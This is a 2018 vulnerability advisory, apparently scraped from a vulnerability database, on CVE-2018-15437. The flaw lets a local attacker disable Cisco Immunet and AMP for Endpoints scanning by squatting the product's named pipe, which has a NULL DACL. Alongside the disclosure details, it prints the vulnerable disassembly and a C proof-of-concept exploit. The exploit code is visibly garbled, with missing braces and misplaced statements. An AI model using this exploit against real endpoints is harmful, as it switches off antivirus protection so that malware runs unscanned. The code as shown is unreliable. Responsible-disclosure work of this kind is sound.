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HistoryNov 09, 2018 - 12:00 a.m.

Cisco Immunet / Cisco AMP For Endpoints Scanning Denial Of Service






`[+] Credits: John Page (aka hyp3rlinx)   
[+] Website:  
[+] Source:  
[+] ISR: ApparitionSec  
***Greetz: indoushka | Eduardo B.***  
[Multiple Products]  
Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0  
Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine.  
The software is complementary with existing antivirus software.  
Cisco AMP (Advanced Malware Protection)  
Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack.   
[Vulnerability Type]  
System Scan Denial of Service  
[CVE Reference]  
Cisco Advisory ID: cisco-sa-20181107-imm-dos  
Cisco Bug ID: CSCvk70945  
Cisco Bug ID: CSCvn05551  
CVSS Score:  
Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X  
[Security Issue]  
A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on  
Microsoft Windows could allow a local attacker to disable the scanning functionality of the product.  
This could allow executable files to be launched on the system without being analyzed for threats.  
The vulnerability is due to improper process resource handling.  
An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or   
Cisco AMP for Endpoints and executing a malicious file.  
A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from  
being protected from further intrusion.  
There are no workarounds that address this vulnerability.  
Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs.  
The affected end user will get pop up warning box when attempting to perform a file or system scan,  
"You Can Not Scan at This Time  
"The Immunet service is not running.  
Please restart the service and retry."  
Below I provide details to exploit Cisco Immunet, however "Cisco AMP For Endpoints" is also affected so the exploit can easily be ported.  
[Vulnerability Details]  
Pipe is Remote Accessible PIPE_REJECT_REMOTE_CLIENTS not present.  
Max Pipe Instances = FF (255)  
lea rax, [rbp+57h+pSecurityDescriptor]  
mov [rbp+57h+SecurityAttributes.nLength], 18h  
mov edx, 1 ; dwRevision  
mov [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax  
lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor  
mov [rbp+57h+SecurityAttributes.bInheritHandle], 1  
call cs:InitializeSecurityDescriptor  
xor r9d, r9d ; bDaclDefaulted  
lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor  
xor r8d, r8d ; pDacl  
lea edx, [r9+1] ; bDaclPresent  
call cs:SetSecurityDescriptorDacl  
mov rcx, [rdi+18h] ; lpName  
lea rax, [rbp+57h+SecurityAttributes]  
mov [rsp+100h+lpSecurityAttributes], rax ; lpSecurityAttributes  
mov edx, 40000003h ; dwOpenMode  
mov [rsp+100h+nDefaultTimeOut], esi ; nDefaultTimeOut  
mov r9d, 0FFh ; nMaxInstances  
mov [rsp+100h+nInBufferSize], 2000h ; nInBufferSize  
mov r8d, 6 ; dwPipeMode  
mov [rsp+100h+nOutBufferSize], 2000h ; nOutBufferSize  
call cs:CreateNamedPipeW  
mov [rdi+8], rax  
call cs:GetLastError  
test eax, eax  
jz short loc_140028203  
#include <windows.h>   
#define pipename "\\\\.\\pipe\\IMMUNET_SCAN"   
/* Discovered by hyp3rlinx  
CVE-2018-15437 */  
int main(void) {   
while (TRUE){  
HANDLE pipe = CreateNamedPipe(pipename, PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND , PIPE_WAIT, 1, 1024, 1024, 120 * 1000, NULL);   
if (pipe == INVALID_HANDLE_VALUE){  
printf("Error: %d", GetLastError());  
printf("%s","pipe created\n");  
ConnectNamedPipe(pipe, NULL);  
return 0;   
[Network Access]  
Local / Remote  
Disclosure Timeline  
Vendor Notification: August 7, 2018  
Vendor acknowledgement: August 7, 2018  
Vendor released fixes: November 7th, 2018  
November 8, 2018 : Public Disclosure  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).  



